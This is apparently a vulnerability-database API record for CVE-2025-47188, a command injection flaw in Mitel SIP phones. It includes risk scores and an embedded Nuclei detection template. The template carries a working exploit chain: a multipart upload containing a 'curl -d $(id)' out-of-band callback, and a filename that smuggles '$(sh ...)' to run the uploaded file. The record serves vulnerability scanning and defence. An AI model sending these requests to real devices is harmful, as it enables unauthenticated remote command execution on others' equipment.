{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-47188/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-47188/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-47188/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-47188/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-47188/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-47188"},"sightings":{"href":"/api/v1/sightings/cve-2025-47188"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.50237,"kev":false,"percentile":0.98857},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-47188.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-47188\n\ninfo:\n  name: Mitel 6000 - OS Command Injection\n  severity: critical\n  author: matejsmycka\n  description: |\n    A vulnerability in the Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones through 6.4 SP4 (R6.4.0.4006), and the 6970 Conference Unit through 6.4 SP4 (R6.4.0.4006) or version V1 R0.1.0, could allow an unauthenticated attacker to conduct a command injection attack due to insufficient parameter sanitization. This template should be run on port 49249/tcp.\n  impact: |\n    Unauthenticated attackers can execute arbitrary commands, potentially disclosing or modifying sensitive data and disrupting device operation.\n  remediation: |\n    Update to the latest Mitel firmware version beyond 6.4 SP4.\n  reference:\n    - https://labs.infoguard.ch/posts/cve-2025-47188_mitel_phone_unauthenticated_rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-47188\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2025-47188\n    epss-score: 0.50237\n    epss-percentile: 0.98857\n    cpe: cpe:2.3:a:mitel:6000:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: mitel\n    max-request: 2\n    fofa-query: icon_hash=\"-1940372141\" || icon_hash=\"-447557905\"\n  tags: cve,cve2025,rce,network,mitel,oast,oob,vkev,vuln\n\nvariables:\n  waf_file: \"524946462400000057415645666d7420100000000100010044ac000088580100020010006461746100000000\"\n  random_number: \"{{rand_base(8)}}\"\n\nhttp:\n  - raw:\n      - |\n       POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0 HTTP/1.1\n       Host: {{Hostname}}\n       Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f\n\n       ------0ba2fc3a8c91370bd74c5f7ab65fda3f\n       Content-Disposition: form-data; name=\"upload_ringtone/newfile\"; filename=\"{{random_number}}.txt\"\n\n       {{hex_decode(waf_file)}}\n       curl -d $(id) {{interactsh-url}}\n       ------0ba2fc3a8c91370bd74c5f7ab65fda3f--\n\n      - |\n       POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0 HTTP/1.1\n       Host: {{Hostname}}\n       Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f\n\n       ------0ba2fc3a8c91370bd74c5f7ab65fda3f\n       Content-Disposition: form-data; name=\"upload_ringtone/newfile\"; filename=\"fake$(sh ${HOME}userdata${HOME}ringtone${HOME}{{random_number}}.txt).wav\"\n\n\n       This is an invalid WAV file\n       ------0ba2fc3a8c91370bd74c5f7ab65fda3f--\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body_1\n        words:\n          - \"ringtone.html\"\n# digest: 4b0a004830460221009a79ed6ee35f733cb3b56823ea70eec90088a0dc17c438bbf941819f1e3e833a022100e2e1dc471af8b2a6d6f7b410f926a6e85e477659ac820641a9dd17f26106e50f:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2025-47188"}